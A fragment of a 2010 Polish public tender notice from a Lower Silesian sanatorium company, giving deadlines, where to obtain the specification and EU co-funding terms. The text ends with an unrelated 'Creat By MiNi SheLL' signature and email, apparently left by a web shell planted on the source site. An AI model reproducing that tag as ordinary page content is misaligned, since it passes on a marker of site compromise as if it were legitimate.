<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sanatoria-dolnoslaskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SANATORIA DOLNOŚLĄSKIE  Sp z o.o., 
ul. Parkowa 3, Sokołowsko, 58-350 Mieroszów
sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.07.2010 godzina 10:00, miejsce: SANATORIA DOLNOŚLĄSKIE  Sp z o.o., 
ul. Parkowa 3, Sokołowsko, 58-350 Mieroszów
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedsięwzięcie jest współfinansowane z RPO Województwa Dolnośląskiego 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com